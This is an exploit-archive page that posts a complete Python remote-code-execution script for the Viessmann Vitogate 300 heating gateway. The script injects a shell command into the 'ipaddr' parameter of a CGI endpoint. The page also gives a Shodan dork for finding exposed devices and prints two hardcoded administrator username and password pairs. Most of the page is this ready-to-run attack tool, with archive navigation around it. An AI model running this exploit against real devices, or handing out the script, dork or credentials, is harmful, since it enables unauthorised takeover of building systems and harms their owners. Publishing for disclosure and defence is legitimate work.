Viessmann Vitogate 300 2.1.3.0 Remote Code Execution

Viessmann Vitogate 300 2.1.3.0 Remote Code Execution: Posted Mar 14, 2024; Authored by ByteHunter; Viessmann Vitogate 300 versions 2.1.3.0 and below suffers from a remote code execution vulnerability.; tags | exploit, remote, code execution; advisories | CVE-2023-5222, CVE-2023-5702; SHA-256 | 86410aca0ad3a7245b8cb07735d4ec21669679039be68751fc1b43a423e0766a; Download | Favorite | View

Viessmann Vitogate 300 2.1.3.0 Remote Code Execution

#- Exploit Title: Viessmann Vitogate 300 <= 2.1.3.0 - Remote Code Execution (RCE)
#- Shodan Dork: http.title:'Vitogate 300'
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton.me
#- Version: versions up to 2.1.3.0
#- Tested on: 2.1.1.0
#- CVE : CVE-2023-5702 & CVE-2023-5222


import argparse
import requests

def banner():
    banner = """
    ╔═══════════════════════════════════╗
             CVE-2023-5702   
           Vitogate 300 RCE
           Author: ByteHunter      
    ╚═══════════════════════════════════╝
    """

    print(banner)


def send_post_request(target_ip, command, target_port):
    payload = {
        "method": "put",
        "form": "form-4-7",
        "session": "",
        "params": {
            "ipaddr": f"1;{command}"
        }
    }

    headers = {
        "Host": target_ip,
        "Content-Length": str(len(str(payload))),
        "Content-Type": "application/json"
    }

    url = f"http://{target_ip}:{target_port}/cgi-bin/vitogate.cgi"


    response = requests.post(url, json=payload, headers=headers)

    if response.status_code == 200:
        print("Result:")
        print(response.text)
    else:
        print(f"Request failed! status code: {response.status_code}")

def main():
    parser = argparse.ArgumentParser(description="Vitogate 300 RCE & Hardcoded Credentials")
    parser.add_argument("--target", required=False, help="Target IP address")
    parser.add_argument("--port", required=False, help="Target port",default="80")
    parser.add_argument("--command", required=False, help="Command")
    parser.add_argument("--creds", action="store_true", help="Show hardcoded credentials")

    args = parser.parse_args()

    if args.creds:
        print("Vitogate 300 hardcoded administrative accounts credentials")
        print("Username: vitomaster, Password: viessmann1917")
        print("Username: vitogate, Password: viessmann")
    else:
        target_ip = args.target
        target_port = args.port
        command = args.command

        if not (target_ip and command):
            print("Both --target and --command options are required.\nor use --creds option to see hardcoded Credentials.")
            return

        send_post_request(target_ip, command,target_port)

if __name__ == "__main__":
    banner()
    main()

Top Authors In Last 30 Days

Red Hat 294 files
Ubuntu 63 files
Debian 34 files
Gentoo 32 files
LiquidWorm 10 files
malvuln 7 files
nu11secur1ty 7 files
Ahmet Umit Bayram 4 files
Adam Gowdiak 4 files
gabe_k 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,038)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,499)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,583)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,746)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,492)
UNIX (9,397)
UnixWare (187)
Windows (6,657)
Other

Viessmann Vitogate 300 2.1.3.0 Remote Code Execution

Viessmann Vitogate 300 2.1.3.0 Remote Code Execution

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Viessmann Vitogate 300 2.1.3.0 Remote Code Execution

Share This

Viessmann Vitogate 300 2.1.3.0 Remote Code Execution

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems